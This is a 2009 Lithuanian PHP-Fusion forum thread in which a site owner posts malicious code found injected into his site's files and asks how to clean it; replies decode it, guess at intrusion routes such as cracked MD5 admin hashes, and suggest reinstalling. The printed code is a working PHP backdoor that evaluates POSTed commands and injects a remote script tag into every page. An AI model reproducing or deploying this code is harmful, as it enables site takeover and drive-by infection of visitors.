Navigacija

Vartotojų tinkle

Prisijungusių svečių: 681
Prisijungusių narių: 0
Prisijungusių narių nėra

Registruoti nariai: 25,956
Naujausias narys: saulyzas

Naujausi straipsniai

Paskutiniai nariai

saulyzas 4 dienos
MaFetas 1 savaitė
TOMIJUS 1 savaitė
ozzWANTED 2 savaitės
Reikalas10 savaitės
Jaunelis17 savaitės
lanis17 savaitės
And2s18 savaitės
Memento Mori23 savaitės
Quwqkibor25 savaitės
asirija29 savaitės
tomeem31 savaitės
weberiz34 savaitės
mRokass37 savaitės
kartoonas38 savaitės
grunskiz41 savaitės
Bruksnys41 savaitės
illusion41 savaitės
ordo42 savaitės
Jurgaila43 savaitės

Informacija:


OS: Unknown
Naršyklė: Nežinoma
IP: 18.188.227.108
Naujienų: 529
Straipsnių: 235
Temų: 52,588
Postų: 522,537
Postų pask. parą: 0
Shout'ų pask. parą: 0
P.S.C. pask. parą: 0
Nuorodų kataloge: 13

Lankomumo Statistika

Peržiūrų šiandien: 22

Iš viso peržiūrų: 22948724

Prisijungti

REGISTRUOTIS
Nario vardas

Slaptažodis



Pamiršai slaptažodį?
Paprašyk naujo

Aktyvuoti save

Šaukykla

Jei norite rašyti žinutes, turite prisijungti.

MaFetas
2024 Lap. 13 22:11:57
hey how, geras dar veikiantis saitas?

Jaunelis
2024 Lie. 25 11:07:43
Oho vis dar veikia svetainė akinanti šypsen Šimtas metų, matau Šaukykloje nuostalgija. Smagu panaršyt po forumą ir pažiūrėt senas temas šypsosi

And2s
2024 Lie. 17 19:07:04
2008 pirmą kart čia patekau, man buvo 10m ir čia pramokau programavimo.. smagu skaityti senas žinutes, tokia nostalgija akinanti šypsen ačiū Ozz kad saugoji šitą kultūrinį reliktą šypsosi

ozzWANTED
2024 Sau. 17 01:01:00
Desperatiškus komentarus šaukykloje su accountu po mėnesio prasibuvimo, ištryniau. Pasaulis ir taip juodas. Įjungiam šviesą, prašviesės. šypsosi

Majakas
2023 Gru. 10 19:12:39
Negaliu patikėti jog žinutės/pranešimai visi yra nuo 2008 m akinanti šypsen

Šaukyklos archyvas

Apklausa

Ar esate patenkinti lietuviško vertimo kokybe?

Taip!

Taip, bet yra ką taisyti (parašysiu komentaruose)

Ne

Norėdamas balsuoti turite prisijungti.
Archyvas
Reklama 400x60
Kas tai ?
Forumas | PHP-Fusion, WordPress, Shopify, PHP ir MySQL (PROGRAMAVIMAS) | Expert PHP, MySQL klausimai

Autorius: Langas Peržiūrų: 5831      Spausdinti temą
2009 Gru. 3 16:12:12          1 žinutė iš 17
Spausdinti pranešimą
Sveiki, užtikau kad šendien jau nebeveikia mano tinklalapis ir daugelyje failų randu šį kodą :


<?php eval(base64_decode('aWYoIWZ1bmN0aW9uX2V4aXN0cygnZTc1ajAnKSl7ZnVuY3Rpb24gZTc1ajAoJHMpe2lmKHByZWdfbWF0Y2hfYWxsKCcjPHNjcmlwdCguKj8pPC9zY3JpcHQ+I2lzJywkcywkYSkpZm9yZWFjaCgkYVswXWFzJHYpaWYoY291bnQoZXhwbG9kZSgiXG4iLCR2KSk+NSl7JGU9cHJlZ19tYXRjaCgnI1tcJyJdW15cc1wnIlwuLDtcPyFcW1xdOi88PlwoXCldezMwLH0jJywkdil8fHByZWdfbWF0Y2goJyNbXChcW10oXHMqXGQrLCl7MjAsfSMnLCR2KTtpZigocHJlZ19tYXRjaCgnI1xiZXZhbFxiIycsJHYpJiYoJGV8fHN0cnBvcygkdiwnZnJvbUNoYXJDb2RlJykpKXx8KCRlJiZzdHJwb3MoJHYsJ2RvY3VtZW50LndyaXRlJykpKSRzPXN0cl9yZXBsYWNlKCR2LCcnLCRzKTt9aWYocHJlZ19tYXRjaF9hbGwoJyM8aWZyYW1lIChbXj5dKj8pc3JjPVtcJyJdPyhodHRwOik/Ly8oW14+XSo/KT4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdYXMkdilpZihwcmVnX21hdGNoKCcjW1wuIF13aWR0aFxzKj1ccypbXCciXT8wKlswLTldW1wnIj4gXXxkaXNwbGF5XHMqOlxzKm5vbmUjaScsJHYpJiYhc3Ryc3RyKCR2LCc/Jy4nPicpKSRzPXByZWdfcmVwbGFjZSgnIycucHJlZ19xdW90ZSgkdiwnIycpLicuKj88L2lmcmFtZT4jaXMnLCcnLCRzKTskcz1zdHJfcmVwbGFjZSgkYT1iYXNlNjRfZGVjb2RlKCdQSE5qY21sd2RDQnpjbU05YUhSMGNEb3ZMMk5oYkdsaWNtRjBhVzl1TFhSbGMzUnBibWN0WlhGMWFYQnRaVzUwTG1OdkxuVnJMMDVsZDBsdFp5OXliMkp2ZEhNdWNHaHdJRDQ4TDNOamNtbHdkRDQ9JyksJycsJHMpO2lmKHN0cmlzdHIoJHMsJzxib2R5JykpJHM9cHJlZ19yZXBsYWNlKCcjKFxzKjxib2R5KSNtaScsJGEuJ1wxJywkcywxKTtlbHNlaWYoc3RycG9zKCRzLCc8YScpKSRzPSRhLiRzO3JldHVybiRzO31mdW5jdGlvbiBlNzVqMDIoJGEsJGIsJGMsJGQpe2dsb2JhbCRlNzVqMDE7JHM9YXJyYXkoKTtpZihmdW5jdGlvbl9leGlzdHMoJGU3NWowMSkpY2FsbF91c2VyX2Z1bmMoJGU3NWowMSwkYSwkYiwkYywkZCk7Zm9yZWFjaChAb2JfZ2V0X3N0YXR1cygxKWFzJHYpaWYoKCRhPSR2WyduYW1lJ10pPT0nZTc1ajAnKXJldHVybjtlbHNlaWYoJGE9PSdvYl9nemhhbmRsZXInKWJyZWFrO2Vsc2Ukc1tdPWFycmF5KCRhPT0nZGVmYXVsdCBvdXRwdXQgaGFuZGxlcic/ZmFsc2U6JGEpO2ZvcigkaT1jb3VudCgkcyktMTskaT49MDskaS0tKXskc1skaV1bMV09b2JfZ2V0X2NvbnRlbnRzKCk7b2JfZW5kX2NsZWFuKCk7fW9iX3N0YXJ0KCdlNzVqMCcpO2ZvcigkaT0wOyRpPGNvdW50KCRzKTskaSsrKXtvYl9zdGFydCgkc1skaV1bMF0pO2VjaG8gJHNbJGldWzFdO319fSRlNzVqMGw9KCgkYT1Ac2V0X2Vycm9yX2hhbmRsZXIoJ2U3NWowMicpKSE9J2U3NWowMicpPyRhOjA7ZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFsnZSddKSk7')); ?>




Gal galite padėti? kaip sutvarkyti tinklalapį ir apsaugoti nuo to, kas tai ?


Redagavo Langas 2009 Gru. 3 17:12:49
2009 Gru. 3 16:12:44          2 žinutė iš 17
Spausdinti pranešimą
Sveikas, čia yra shell'as virusas. Oj turėsi darbelio panaikinti sakant bus sunku. Apsaugosi tik su kodu kaip kiti sako antivirusinė. Be to naikink tuos virusus ir CHMOD index.php į 455.

http://mightmedia.lt Lietuvių sukurtas TVS.
Redagavo d0mce 2009 Gru. 3 16:12:43
2009 Gru. 3 16:12:49          3 žinutė iš 17
Spausdinti pranešimą
va kas

if(!function_exists('e75j0')){function e75j0($s){if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0]as$v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}if(preg_match_all('#<iframe ([^>]*?)src=[\'"]?(http:)?//([^>]*?)>#is',$s,$a))foreach($a[0]as$v)if(preg_match('#[\. ]width\s*=\s*[\'"]?0*[0-9][\'"> ]|display\s*:\s*none#i',$v)&&!strstr($v,'?'.'>'))$s=preg_replace('#'.preg_quote($v,'#').'.*?</iframe>#is','',$s);$s=str_replace($a=base64_decode('PHNjcmlwdCBzcmM9aHR0cDovL2NhbGlicmF0aW9uLXRlc3RpbmctZXF1aXBtZW50LmNvLnVrL05ld0ltZy9yb2JvdHMucGhwID48L3NjcmlwdD4='),'',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',$a.'\1',$s,1);elseif(strpos($s,'<a'))$s=$a.$s;return$s;}function e75j02($a,$b,$c,$d){global$e75j01;$s=array();if(function_exists($e75j01))call_user_func($e75j01,$a,$b,$c,$d);foreach(@ob_get_status(1)as$v)if(($a=$v['name'])=='e75j0')return;elseif($a=='ob_gzhandler')break;else$s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('e75j0');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}$e75j0l=(($a=@set_error_handler('e75j02'))!='e75j02')?$a:0;eval(base64_decode($_POST['e']));




ir dar viduje vienas kodas užkoduotas

<script src=http://calibration-testing-equipment.co.uk/NewImg/robots.php ></script>




Čia shellas įkištas kiek supratau, buvo kažkur forume jau tokia tema.


Redagavo maxas66 2009 Gru. 3 16:12:44
2009 Gru. 3 16:12:52          4 žinutė iš 17
Spausdinti pranešimą
Atsinaujink jeigu naudoji PHP-FUSION 6 juk didelė saugumo klaidą ištaisyta!!!!!

2009 Gru. 3 16:12:04          5 žinutė iš 17
Spausdinti pranešimą
Nevo teisingas, taip tai buvo tema. MediaL šitas atvejis buvo, nu ką pasakysiu MediaL nebeturėjo jegu su juo kovoti manau tau irgi neatsiras. Visu pirma, galėjo įmesti shell'ą į tavo svetaine taip: Davei kažkam administracijos laipsnį, ir jis įdėjo shell'a arba jo slaptažodį žinojo. Gali būti variantas ir tavo atkodavo md5 koduotę, ir sužinojo tavo slaptažodį įstate į svetaine shellą. Arba dar viena išeitis, leidi prisegti failus.

http://mightmedia.lt Lietuvių sukurtas TVS.
2009 Gru. 3 16:12:24          6 žinutė iš 17
Spausdinti pranešimą
d0mce parašė:
Nevo teisingas, taip tai buvo tema. MediaL šitas atvejis buvo, nu ką pasakysiu MediaL nebeturėjo jegu su juo kovoti manau tau irgi neatsiras. Visu pirma, galėjo įmesti shell'ą į tavo svetaine taip: Davei kažkam administracijos laipsnį, ir jis įdėjo shell'a arba jo slaptažodį žinojo. Gali būti variantas ir tavo atkodavo md5 koduotę, ir sužinojo tavo slaptažodį įstate į svetaine shellą. Arba dar viena išeitis, leidi prisegti failus.


Šitie variantai galimi jeigu turi priejima prie administravimo, kitu atvėju ne. (Na bet galimas daiktas, kad slaptažodžiai buvo: sūrys, šūdas ir pan).

2009 Gru. 3 16:12:59          7 žinutė iš 17
Spausdinti pranešimą
Drageli, arba žino jo kas hasha, ir su juo sakau atkodavo md5 koduotę, įlindo į webą ir pradėjo žaisti. Langas visad kai dedi kam administracijos laipsnį neduok pridėtinių puslapių nuorodos uždrauskmerkia akį

http://mightmedia.lt Lietuvių sukurtas TVS.
2009 Gru. 3 16:12:02          8 žinutė iš 17
Spausdinti pranešimą
d0mce parašė:
Drageli, arba žino jo kas hasha, ir su juo sakau atkodavo md5 koduotę, įlindo į webą ir pradėjo žaisti. Langas visad kai dedi kam administracijos laipsnį neduok pridėtinių puslapių nuorodos uždrauskmerkia akį


Na tai sakau slaptažodis buvo labai easy, ir galėjo nebent atkodoti, nes jeigu aš duočiau viena iš savo hash'ų tu atkodinėtum dienas, naktis ir vistiek neatkodotum.

2009 Gru. 3 16:12:36          9 žinutė iš 17
Spausdinti pranešimą
Dragelis parašė:
Atsinaujink jeigu naudoji PHP-FUSION 6 juk didelė saugumo klaidą ištaisyta!!!!!

Atsinaujinau dar tą pačia dieną kai naujiena parašyta buvo, taip ir nesupratau tiksliai ką reikia daryti
Bėje nebesvaik, administratorių nebėra, visus pašalinęs esu jau ~ savaitę + yra administracijos apsauga navigation.php ar koks ten faile, automatiškai užbanina. niekas nežino nei duomenų bazės nei ftp.


Redagavo Langas 2009 Gru. 3 16:12:44
2009 Gru. 3 16:12:54          10 žinutė iš 17
Spausdinti pranešimą
gal pas tave buvo galima prisegt failus prie kokio forumo?

http://mightmedia.lt Lietuvių sukurtas TVS.
2009 Gru. 3 16:12:43          11 žinutė iš 17
Spausdinti pranešimą
Taip, tačiau ne php ir kitų panašio tipo

2009 Gru. 3 16:12:15          12 žinutė iš 17
Spausdinti pranešimą
tai šitą galima, apeiti, kad leistu php patalpinti.merkia akį

http://mightmedia.lt Lietuvių sukurtas TVS.
2009 Gru. 3 16:12:03          13 žinutė iš 17
Spausdinti pranešimą
Gi nėra jokių patalpintu failų, jei nepastebėjai, temą sukūriau expert skiltyje, todėl prašyčiau tokiam botui kaip tu kuris rašo nesamones, tai yra atvėjus kurių negalėjo būti, tai nerašyk išvis.
Dabar dar vienas klausimėlis, jeigu pakeisiu includes folderį ar svetainė vėl veiks ? jeigu veiks tai kaip išvengti to ateityje, nes pirmą kartą susiduriu su tokiu atvėju


Redagavo Langas 2009 Gru. 3 16:12:38
2009 Gru. 3 17:12:23          14 žinutė iš 17
Spausdinti pranešimą
Man taspats atvejis buvo,pakovojau savaicike,jau buvo pradinge vienu metu,bet veliau vel pradejo tas pats,sql irgi buvo uzkrestas,tai tiesiog ftp kopija pasidariau i savo kompa jei prireiktu kokiu failiuku. Ir kurk weba is naujo,tik pirma istrink absoliuciai visus senus failus,pakeisk visus paswordus. Tik pirma savo kompe turek kokia antivirusine ,kad netuciau vel nebutu to paties

Rekomenduoju gix.lt hostinga
Taip pat starhost.lt paslaugas
www.surfcss.lt Jau greit
2009 Gru. 3 17:12:36          15 žinutė iš 17
Spausdinti pranešimą
O dieve, kaip manai ant v7 eis uždėti v6 vartotojus, siuntinius forumo temas ir postus, komentarus ?

2009 Gru. 3 22:12:52          16 žinutė iš 17
Spausdinti pranešimą
na net nzn,jau cia reiktu profu klausti nes as buvau v7 taj ir ka reikejo persikeliau i v7

Rekomenduoju gix.lt hostinga
Taip pat starhost.lt paslaugas
www.surfcss.lt Jau greit
2009 Gru. 3 22:12:01          17 žinutė iš 17
Spausdinti pranešimą
per pma man rodos galima

www.ls-planet.com
Peršokti į forumą: